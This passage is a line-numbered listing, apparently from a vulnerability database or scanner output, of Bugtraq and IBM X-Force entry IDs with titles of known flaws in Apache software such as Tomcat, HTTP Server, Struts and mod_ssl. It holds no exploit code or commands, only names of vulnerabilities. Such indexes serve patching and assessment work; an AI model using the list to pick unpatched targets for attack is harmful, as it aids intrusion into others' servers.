6110| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
6111| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
6112| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
6113| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
6114| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
6115| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
6116| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
6117| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
6118| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
6119| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
6120| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
6121| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
6122| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
6123| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
6124| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
6125| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
6126| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
6127| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
6128| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
6129| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
6130| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
6131| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
6132| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
6133| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
6134| [20527] Apache Mod_TCL Remote Format String Vulnerability
6135| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
6136| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
6137| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
6138| [19106] Apache Tomcat Information Disclosure Vulnerability
6139| [18138] Apache James SMTP Denial Of Service Vulnerability
6140| [17342] Apache Struts Multiple Remote Vulnerabilities
6141| [17095] Apache Log4Net Denial Of Service Vulnerability
6142| [16916] Apache mod_python FileSession Code Execution Vulnerability
6143| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
6144| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
6145| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
6146| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
6147| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
6148| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
6149| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
6150| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
6151| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
6152| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
6153| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
6154| [15177] PHP Apache 2 Local Denial of Service Vulnerability
6155| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
6156| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
6157| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
6158| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
6159| [14106] Apache HTTP Request Smuggling Vulnerability
6160| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
6161| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
6162| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
6163| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
6164| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
6165| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
6166| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
6167| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
6168| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
6169| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
6170| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
6171| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
6172| [11471] Apache mod_include Local Buffer Overflow Vulnerability
6173| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
6174| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
6175| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
6176| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
6177| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
6178| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
6179| [11094] Apache mod_ssl Denial Of Service Vulnerability
6180| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
6181| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
6182| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
6183| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
6184| [10478] ClueCentral Apache Suexec Patch Security Weakness
6185| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
6186| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
6187| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
6188| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
6189| [9921] Apache Connection Blocking Denial Of Service Vulnerability
6190| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
6191| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
6192| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
6193| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
6194| [9733] Apache Cygwin Directory Traversal Vulnerability
6195| [9599] Apache mod_php Global Variables Information Disclosure Weakness
6196| [9590] Apache-SSL Client Certificate Forging Vulnerability
6197| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
6198| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
6199| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
6200| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
6201| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
6202| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
6203| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
6204| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
6205| [8898] Red Hat Apache Directory Index Default Configuration Error
6206| [8883] Apache Cocoon Directory Traversal Vulnerability
6207| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
6208| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
6209| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
6210| [8707] Apache htpasswd Password Entropy Weakness
6211| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
6212| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
6213| [8226] Apache HTTP Server Multiple Vulnerabilities
6214| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
6215| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
6216| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
6217| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
6218| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
6219| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
6220| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
6221| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
6222| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
6223| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
6224| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
6225| [7255] Apache Web Server File Descriptor Leakage Vulnerability
6226| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
6227| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
6228| [6939] Apache Web Server ETag Header Information Disclosure Weakness
6229| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
6230| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
6231| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
6232| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
6233| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
6234| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
6235| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
6236| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
6237| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
6238| [6117] Apache mod_php File Descriptor Leakage Vulnerability
6239| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
6240| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
6241| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
6242| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
6243| [5992] Apache HTDigest Insecure Temporary File Vulnerability
6244| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
6245| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
6246| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
6247| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
6248| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
6249| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
6250| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
6251| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
6252| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
6253| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
6254| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
6255| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
6256| [5485] Apache 2.0 Path Disclosure Vulnerability
6257| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
6258| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
6259| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
6260| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
6261| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
6262| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
6263| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
6264| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
6265| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
6266| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
6267| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
6268| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
6269| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
6270| [4437] Apache Error Message Cross-Site Scripting Vulnerability
6271| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
6272| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
6273| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
6274| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
6275| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
6276| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
6277| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
6278| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
6279| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
6280| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
6281| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
6282| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
6283| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
6284| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
6285| [3596] Apache Split-Logfile File Append Vulnerability
6286| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
6287| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
6288| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
6289| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
6290| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
6291| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
6292| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
6293| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
6294| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
6295| [3169] Apache Server Address Disclosure Vulnerability
6296| [3009] Apache Possible Directory Index Disclosure Vulnerability
6297| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
6298| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
6299| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
6300| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
6301| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
6302| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
6303| [2216] Apache Web Server DoS Vulnerability
6304| [2182] Apache /tmp File Race Vulnerability
6305| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
6306| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
6307| [1821] Apache mod_cookies Buffer Overflow Vulnerability
6308| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
6309| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
6310| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
6311| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
6312| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
6313| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
6314| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
6315| [1457] Apache::ASP source.asp Example Script Vulnerability
6316| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
6317| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
6318|
6319| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6320| [86258] Apache CloudStack text fields cross-site scripting
6321| [85983] Apache Subversion mod_dav_svn module denial of service
6322| [85875] Apache OFBiz UEL code execution
6323| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
6324| [85871] Apache HTTP Server mod_session_dbd unspecified
6325| [85756] Apache Struts OGNL expression command execution
6326| [85755] Apache Struts DefaultActionMapper class open redirect
6327| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
6328| [85574] Apache HTTP Server mod_dav denial of service
6329| [85573] Apache Struts Showcase App OGNL code execution
6330| [85496] Apache CXF denial of service
6331| [85423] Apache Geronimo RMI classloader code execution
6332| [85326] Apache Santuario XML Security for C++ buffer overflow
6333| [85323] Apache Santuario XML Security for Java spoofing
6334| [85319] Apache Qpid Python client SSL spoofing
6335| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
6336| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
6337| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
6338| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
6339| [84952] Apache Tomcat CVE-2012-3544 denial of service
6340| [84763] Apache Struts CVE-2013-2135 security bypass
6341| [84762] Apache Struts CVE-2013-2134 security bypass
6342| [84719] Apache Subversion CVE-2013-2088 command execution
6343| [84718] Apache Subversion CVE-2013-2112 denial of service
6344| [84717] Apache Subversion CVE-2013-1968 denial of service
6345| [84577] Apache Tomcat security bypass
6346| [84576] Apache Tomcat symlink
6347| [84543] Apache Struts CVE-2013-2115 security bypass
6348| [84542] Apache Struts CVE-2013-1966 security bypass
6349| [84154] Apache Tomcat session hijacking
6350| [84144] Apache Tomcat denial of service
6351| [84143] Apache Tomcat information disclosure
6352| [84111] Apache HTTP Server command execution
6353| [84043] Apache Virtual Computing Lab cross-site scripting
6354| [84042] Apache Virtual Computing Lab cross-site scripting
6355| [83782] Apache CloudStack information disclosure
6356| [83781] Apache CloudStack security bypass
6357| [83720] Apache ActiveMQ cross-site scripting
6358| [83719] Apache ActiveMQ denial of service
6359| [83718] Apache ActiveMQ denial of service
6360| [83263] Apache Subversion denial of service
6361| [83262] Apache Subversion denial of service
6362| [83261] Apache Subversion denial of service
6363| [83259] Apache Subversion denial of service
6364| [83035] Apache mod_ruid2 security bypass
6365| [82852] Apache Qpid federation_tag security bypass
6366| [82851] Apache Qpid qpid::framing::Buffer denial of service
6367| [82758] Apache Rave User RPC API information disclosure
6368| [82663] Apache Subversion svn_fs_file_length() denial of service
6369| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
6370| [82641] Apache Qpid AMQP denial of service
6371| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
6372| [82618] Apache Commons FileUpload symlink
6373| [82360] Apache HTTP Server manager interface cross-site scripting
6374| [82359] Apache HTTP Server hostnames cross-site scripting
6375| [82338] Apache Tomcat log/logdir information disclosure
6376| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
6377| [82268] Apache OpenJPA deserialization command execution
6378| [81981] Apache CXF UsernameTokens security bypass
6379| [81980] Apache CXF WS-Security security bypass
6380| [81398] Apache OFBiz cross-site scripting
6381| [81240] Apache CouchDB directory traversal
6382| [81226] Apache CouchDB JSONP code execution
6383| [81225] Apache CouchDB Futon user interface cross-site scripting
6384| [81211] Apache Axis2/C SSL spoofing
6385| [81167] Apache CloudStack DeployVM information disclosure
6386| [81166] Apache CloudStack AddHost API information disclosure
6387| [81165] Apache CloudStack createSSHKeyPair API information disclosure
6388| [80518] Apache Tomcat cross-site request forgery security bypass
6389| [80517] Apache Tomcat FormAuthenticator security bypass
6390| [80516] Apache Tomcat NIO denial of service
6391| [80408] Apache Tomcat replay-countermeasure security bypass
6392| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
6393| [80317] Apache Tomcat slowloris denial of service
6394| [79984] Apache Commons HttpClient SSL spoofing
6395| [79983] Apache CXF SSL spoofing
6396| [79830] Apache Axis2/Java SSL spoofing
6397| [79829] Apache Axis SSL spoofing
6398| [79809] Apache Tomcat DIGEST security bypass
6399| [79806] Apache Tomcat parseHeaders() denial of service
6400| [79540] Apache OFBiz unspecified
6401| [79487] Apache Axis2 SAML security bypass
6402| [79212] Apache Cloudstack code execution
6403| [78734] Apache CXF SOAP Action security bypass
6404| [78730] Apache Qpid broker denial of service
6405| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
6406| [78563] Apache mod_pagespeed module unspecified cross-site scripting
6407| [78562] Apache mod_pagespeed module security bypass
6408| [78454] Apache Axis2 security bypass
6409| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
6410| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
6411| [78321] Apache Wicket unspecified cross-site scripting
6412| [78183] Apache Struts parameters denial of service
6413| [78182] Apache Struts cross-site request forgery
6414| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
6415| [77987] mod_rpaf module for Apache denial of service
6416| [77958] Apache Struts skill name code execution
6417| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
6418| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
6419| [77568] Apache Qpid broker security bypass
6420| [77421] Apache Libcloud spoofing
6421| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
6422| [77046] Oracle Solaris Apache HTTP Server information disclosure
6423| [76837] Apache Hadoop information disclosure
6424| [76802] Apache Sling CopyFrom denial of service
6425| [76692] Apache Hadoop symlink
6426| [76535] Apache Roller console cross-site request forgery
6427| [76534] Apache Roller weblog cross-site scripting
6428| [76152] Apache CXF elements security bypass
6429| [76151] Apache CXF child policies security bypass
6430| [75983] MapServer for Windows Apache file include
6431| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
6432| [75558] Apache POI denial of service
6433| [75545] PHP apache_request_headers() buffer overflow
6434| [75302] Apache Qpid SASL security bypass
6435| [75211] Debian GNU/Linux apache 2 cross-site scripting
6436| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
6437| [74871] Apache OFBiz FlexibleStringExpander code execution
6438| [74870] Apache OFBiz multiple cross-site scripting
6439| [74750] Apache Hadoop unspecified spoofing
6440| [74319] Apache Struts XSLTResult.java file upload
6441| [74313] Apache Traffic Server header buffer overflow
6442| [74276] Apache Wicket directory traversal
6443| [74273] Apache Wicket unspecified cross-site scripting
6444| [74181] Apache HTTP Server mod_fcgid module denial of service
6445| [73690] Apache Struts OGNL code execution
6446| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
6447| [73100] Apache MyFaces in directory traversal
6448| [73096] Apache APR hash denial of service
6449| [73052] Apache Struts name cross-site scripting
6450| [73030] Apache CXF UsernameToken security bypass
6451| [72888] Apache Struts lastName cross-site scripting
6452| [72758] Apache HTTP Server httpOnly information disclosure
6453| [72757] Apache HTTP Server MPM denial of service
6454| [72585] Apache Struts ParameterInterceptor security bypass
6455| [72438] Apache Tomcat Digest security bypass
6456| [72437] Apache Tomcat Digest security bypass
6457| [72436] Apache Tomcat DIGEST security bypass
6458| [72425] Apache Tomcat parameter denial of service
6459| [72422] Apache Tomcat request object information disclosure
6460| [72377] Apache HTTP Server scoreboard security bypass
6461| [72345] Apache HTTP Server HTTP request denial of service
6462| [72229] Apache Struts ExceptionDelegator command execution
6463| [72089] Apache Struts ParameterInterceptor directory traversal
6464| [72088] Apache Struts CookieInterceptor command execution
6465| [72047] Apache Geronimo hash denial of service
6466| [72016] Apache Tomcat hash denial of service
6467| [71711] Apache Struts OGNL expression code execution
6468| [71654] Apache Struts interfaces security bypass
6469| [71620] Apache ActiveMQ failover denial of service
6470| [71617] Apache HTTP Server mod_proxy module information disclosure
6471| [71508] Apache MyFaces EL security bypass
6472| [71445] Apache HTTP Server mod_proxy security bypass
6473| [71203] Apache Tomcat servlets privilege escalation
6474| [71181] Apache HTTP Server ap_pregsub() denial of service
6475| [71093] Apache HTTP Server ap_pregsub() buffer overflow
6476| [70336] Apache HTTP Server mod_proxy information disclosure
6477| [69804] Apache HTTP Server mod_proxy_ajp denial of service
6478| [69472] Apache Tomcat AJP security bypass
6479| [69396] Apache HTTP Server ByteRange filter denial of service
6480| [69394] Apache Wicket multi window support cross-site scripting
6481| [69176] Apache Tomcat XML information disclosure
6482| [69161] Apache Tomcat jsvc information disclosure
6483| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
6484| [68541] Apache Tomcat sendfile information disclosure
6485| [68420] Apache XML Security denial of service
6486| [68238] Apache Tomcat JMX information disclosure
6487| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
6488| [67804] Apache Subversion control rules information disclosure
6489| [67803] Apache Subversion control rules denial of service
6490| [67802] Apache Subversion baselined denial of service
6491| [67672] Apache Archiva multiple cross-site scripting
6492| [67671] Apache Archiva multiple cross-site request forgery
6493| [67564] Apache APR apr_fnmatch() denial of service
6494| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
6495| [67515] Apache Tomcat annotations security bypass
6496| [67480] Apache Struts s:submit information disclosure
6497| [67414] Apache APR apr_fnmatch() denial of service
6498| [67356] Apache Struts javatemplates cross-site scripting
6499| [67354] Apache Struts Xwork cross-site scripting
6500| [66676] Apache Tomcat HTTP BIO information disclosure
6501| [66675] Apache Tomcat web.xml security bypass
6502| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
6503| [66241] Apache HttpComponents information disclosure
6504| [66154] Apache Tomcat ServletSecurity security bypass
6505| [65971] Apache Tomcat ServletSecurity security bypass
6506| [65876] Apache Subversion mod_dav_svn denial of service
6507| [65343] Apache Continuum unspecified cross-site scripting
6508| [65162] Apache Tomcat NIO connector denial of service
6509| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
6510| [65160] Apache Tomcat HTML Manager interface cross-site scripting
6511| [65159] Apache Tomcat ServletContect security bypass
6512| [65050] Apache CouchDB web-based administration UI cross-site scripting
6513| [64773] Oracle HTTP Server Apache Plugin unauthorized access
6514| [64473] Apache Subversion blame -g denial of service
6515| [64472] Apache Subversion walk() denial of service
6516| [64407] Apache Axis2 CVE-2010-0219 code execution
6517| [63926] Apache Archiva password privilege escalation
6518| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
6519| [63493] Apache Archiva credentials cross-site request forgery
6520| [63477] Apache Tomcat HttpOnly session hijacking
6521| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
6522| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
6523| [62959] Apache Shiro filters security bypass
6524| [62790] Apache Perl cgi module denial of service
6525| [62576] Apache Qpid exchange denial of service
6526| [62575] Apache Qpid AMQP denial of service
6527| [62354] Apache Qpid SSL denial of service
6528| [62235] Apache APR-util apr_brigade_split_line() denial of service
6529| [62181] Apache XML-RPC SAX Parser information disclosure
6530| [61721] Apache Traffic Server cache poisoning
6531| [61202] Apache Derby BUILTIN authentication functionality information disclosure
6532| [61186] Apache CouchDB Futon cross-site request forgery
6533| [61169] Apache CXF DTD denial of service
6534| [61070] Apache Jackrabbit search.jsp SQL injection
6535| [61006] Apache SLMS Quoting cross-site request forgery
6536| [60962] Apache Tomcat time cross-site scripting
6537| [60883] Apache mod_proxy_http information disclosure
6538| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
6539| [60264] Apache Tomcat Transfer-Encoding denial of service
6540| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
6541| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
6542| [59413] Apache mod_proxy_http timeout information disclosure
6543| [59058] Apache MyFaces unencrypted view state cross-site scripting
6544| [58827] Apache Axis2 xsd file include
6545| [58790] Apache Axis2 modules cross-site scripting
6546| [58299] Apache ActiveMQ queueBrowse cross-site scripting
6547| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
6548| [58056] Apache ActiveMQ .jsp source code disclosure
6549| [58055] Apache Tomcat realm name information disclosure
6550| [58046] Apache HTTP Server mod_auth_shadow security bypass
6551| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
6552| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
6553| [57429] Apache CouchDB algorithms information disclosure
6554| [57398] Apache ActiveMQ Web console cross-site request forgery
6555| [57397] Apache ActiveMQ createDestination.action cross-site scripting
6556| [56653] Apache HTTP Server DNS spoofing
6557| [56652] Apache HTTP Server DNS cross-site scripting
6558| [56625] Apache HTTP Server request header information disclosure
6559| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
6560| [56623] Apache HTTP Server mod_proxy_ajp denial of service
6561| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
6562| [55857] Apache Tomcat WAR files directory traversal
6563| [55856] Apache Tomcat autoDeploy attribute security bypass
6564| [55855] Apache Tomcat WAR directory traversal
6565| [55210] Intuit component for Joomla! Apache information disclosure
6566| [54533] Apache Tomcat 404 error page cross-site scripting
6567| [54182] Apache Tomcat admin default password
6568| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
6569| [53666] Apache HTTP Server Solaris pollset support denial of service
6570| [53650] Apache HTTP Server HTTP basic-auth module security bypass
6571| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
6572| [53041] mod_proxy_ftp module for Apache denial of service
6573| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
6574| [51953] Apache Tomcat Path Disclosure
6575| [51952] Apache Tomcat Path Traversal
6576| [51951] Apache stronghold-status Information Disclosure
6577| [51950] Apache stronghold-info Information Disclosure
6578| [51949] Apache PHP Source Code Disclosure
6579| [51948] Apache Multiviews Attack
6580| [51946] Apache JServ Environment Status Information Disclosure
6581| [51945] Apache error_log Information Disclosure
6582| [51944] Apache Default Installation Page Pattern Found
6583| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
6584| [51942] Apache AXIS XML External Entity File Retrieval
6585| [51941] Apache AXIS Sample Servlet Information Leak
6586| [51940] Apache access_log Information Disclosure
6587| [51626] Apache mod_deflate denial of service
6588| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
6589| [51365] Apache Tomcat RequestDispatcher security bypass
6590| [51273] Apache HTTP Server Incomplete Request denial of service
6591| [51195] Apache Tomcat XML information disclosure
6592| [50994] Apache APR-util xml/apr_xml.c denial of service
6593| [50993] Apache APR-util apr_brigade_vprintf denial of service
6594| [50964] Apache APR-util apr_strmatch_precompile() denial of service
6595| [50930] Apache Tomcat j_security_check information disclosure
6596| [50928] Apache Tomcat AJP denial of service
6597| [50884] Apache HTTP Server XML ENTITY denial of service
6598| [50808] Apache HTTP Server AllowOverride privilege escalation
